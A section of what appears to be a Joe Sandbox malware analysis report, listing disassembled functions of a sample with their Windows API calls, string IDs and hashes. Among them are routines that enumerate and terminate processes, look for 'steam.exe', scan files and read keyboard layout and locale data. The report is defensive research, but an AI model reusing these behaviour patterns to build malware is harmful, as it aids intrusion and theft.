                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: 56f113bd782de1cb8c797c4a4f1bfb31420902069356f80beec158f2b6649970
                                    • Instruction ID: 86e8c9fc9758242241076ddc03e09a4715d925fd8f4864e637b65a773042529e
                                    • Opcode Fuzzy Hash: 56f113bd782de1cb8c797c4a4f1bfb31420902069356f80beec158f2b6649970
                                    • Instruction Fuzzy Hash: D7414F31611215DBCB32EFA8EC89ADF77E4AF25700F045139F94A9BA22DB30DD418B91
                                    Function 000C46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C46B9
                                    • Process32First.KERNEL32(00000000,00000128), ref: 000C46C9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C46DB
                                    • StrCmpCA.SHLWAPI(?,?), ref: 000C46ED
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000C4702
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 000C4711
                                    • CloseHandle.KERNEL32(00000000), ref: 000C4718
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C4726
                                    • CloseHandle.KERNEL32(00000000), ref: 000C4731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: f8c3fd37bbb59855b4cea29dbb7b126e42d5468ed7864d586c3277b95d742d34
                                    • Instruction ID: 809c414e845737b75745b1cacbe12e734b7cefb652f0b76a2f81417d63a13998
                                    • Opcode Fuzzy Hash: f8c3fd37bbb59855b4cea29dbb7b126e42d5468ed7864d586c3277b95d742d34
                                    • Instruction Fuzzy Hash: 74016D31A02124ABE7615B65BC8DFFE37BCAB49B12F04019AF94991190EF749D848A61
                                    Function 000C4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 000C4628
                                    • Process32First.KERNEL32(00000000,00000128), ref: 000C4638
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C464A
                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 000C4660
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C4672
                                    • CloseHandle.KERNEL32(00000000), ref: 000C467D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                    • String ID: steam.exe
                                    • API String ID: 2284531361-2826358650
                                    • Opcode ID: 0579f1575f1e25d10cdf0ac370a5629ceaea9cd215fce386454a82fe147b150f
                                    • Instruction ID: 913c9b9c1419b6cca9465bf16de67a75aed675b76c45a6cfcadb5bf319276a80
                                    • Opcode Fuzzy Hash: 0579f1575f1e25d10cdf0ac370a5629ceaea9cd215fce386454a82fe147b150f
                                    • Instruction Fuzzy Hash: 6C018F71A02224ABD760AB64BC4DFEE77ACEB09351F0401DAFD48D1040EB749D948BE1
                                    Function 000B4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B4B51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4B74
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4B7F
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000B4B8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4BA7
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000B4BB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4BDE
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B4BFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID:
                                    • API String ID: 2567437900-0
                                    • Opcode ID: 928e27cc82289acb6219fd7a70149fc481ca150d353578f88c5843cada9ddcba
                                    • Instruction ID: cbace958ef3af48c2062ea04b4856792e10cbe67a401948af7dc0b84a1580bf6
                                    • Opcode Fuzzy Hash: 928e27cc82289acb6219fd7a70149fc481ca150d353578f88c5843cada9ddcba
                                    • Instruction Fuzzy Hash: 28310D316215159BCB22EFA8EC89EDE77F9AF61700F041135F9499B663EB30DD018B91
                                    Function 004666B3 Relevance: 11.6, Strings: 8, Instructions: 1617COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +ot$/J?=$/J?=$:JI$<D>%$@'~-$o>v$/w
                                    • API String ID: 0-2428296759
                                    • Opcode ID: 8501148803a364389ef1ab2b8352778cae570b8c68027cc47eba22a38adc017e
                                    • Instruction ID: edd38893e8d0cad6677de66b1f29575c85035f6f94fed70a3488bb7b6dbbf8ba
                                    • Opcode Fuzzy Hash: 8501148803a364389ef1ab2b8352778cae570b8c68027cc47eba22a38adc017e
                                    • Instruction Fuzzy Hash: B3B217F3A0C2049FD304AE2DEC8566AFBE5EF94720F1A493DEAC4C7740E67598058697
                                    Function 00464D68 Relevance: 11.5, Strings: 8, Instructions: 1522COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2Es~$:Gq_$?V~~$d{}$q)y$s-n[$v+$S
                                    • API String ID: 0-953988413
                                    • Opcode ID: ab23d02b751d8560b1d5940f104597b885e5cc1dce03822f24f0c5ba3f15ac31
                                    • Instruction ID: b122d33de5dd1da4d42d36aef9759d5d16b2205007ae91eddcbc534927d65c9c
                                    • Opcode Fuzzy Hash: ab23d02b751d8560b1d5940f104597b885e5cc1dce03822f24f0c5ba3f15ac31
                                    • Instruction Fuzzy Hash: 23A2E4F360C6149FE704AE2DEC8567ABBE9EF94320F1A493DEAC4C3340E63558458697
                                    Function 000C2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 000C2D9B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 000C2DAD
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 000C2DBA
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000C2DEC
                                    • LocalFree.KERNEL32(00000000), ref: 000C2FCA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 42173a6ca9974d2a76468edacf9866e30e3e82ed66f4875175c669aa80c25004
                                    • Instruction ID: 278d21baa926155f77705a6ec7a8622b5527897da878dd66ac03147884fe68ed
                                    • Opcode Fuzzy Hash: 42173a6ca9974d2a76468edacf9866e30e3e82ed66f4875175c669aa80c25004
                                    • Instruction Fuzzy Hash: D2B11671901214CFD755CF18D988B9DB7F1BB44329F29C1AEE408AB6A2D7769D82CF80
                                    Function 00459130 Relevance: 10.4, Strings: 7, Instructions: 1677COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3mW}$Vg$Ws7$di{;$e&{$t&w$Uw
                                    • API String ID: 0-4138245297
                                    • Opcode ID: 31defb3a8f9a530eb5e92bb3673ce7d62d6ea069cb69f1dcf09b7b18052d5671
                                    • Instruction ID: fb7382b1c2d74074e6b23e966afad1d709b1dd7f70e3e623a4e345d38ae8c6b9
                                    • Opcode Fuzzy Hash: 31defb3a8f9a530eb5e92bb3673ce7d62d6ea069cb69f1dcf09b7b18052d5671
                                    • Instruction Fuzzy Hash: CBB229F3A082049FD3046E2DEC8567AF7E9EFD4720F1A863DEAC487744E93558058696
                                    Function 0045AD19 Relevance: 9.2, Strings: 6, Instructions: 1669COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?q[$Nav$Q=$aQ{$qpq$D?{
                                    • API String ID: 0-3850499687
                                    • Opcode ID: 624d4c4ad2cdf2828c130da73c8c224f4fd76262865d1621c6353f72e279ec56
                                    • Instruction ID: 9dacab9e69096e77d00f5700c669195bcda082a8dab54bfb41f72a9363420c6f
                                    • Opcode Fuzzy Hash: 624d4c4ad2cdf2828c130da73c8c224f4fd76262865d1621c6353f72e279ec56
                                    • Instruction Fuzzy Hash: 7BB24BF360C2049FE308AE2DEC8567AB7E6EFD4720F1A853DE6C5C7744EA3558018696
                                    Function 00463352 Relevance: 9.1, Strings: 6, Instructions: 1594COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: w^$)f$ERl[$PLGY$Y16R$?[n
                                    • API String ID: 0-502583953
                                    • Opcode ID: 6df70cf0b891fe1e42f90eb6f476782f5e81f176729781dac06be9ced50f25f7
                                    • Instruction ID: 03126ae4140b674bad3a26c1cd670cefceb3ecf80c99e592f59b1328ba90d312
                                    • Opcode Fuzzy Hash: 6df70cf0b891fe1e42f90eb6f476782f5e81f176729781dac06be9ced50f25f7
                                    • Instruction Fuzzy Hash: 3EA2F8F360C204AFE304AE2DEC8567ABBE9EF94720F16453DE6C5C3744EA3598058697
                                    Function 0045E44E Relevance: 9.1, Strings: 6, Instructions: 1568COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
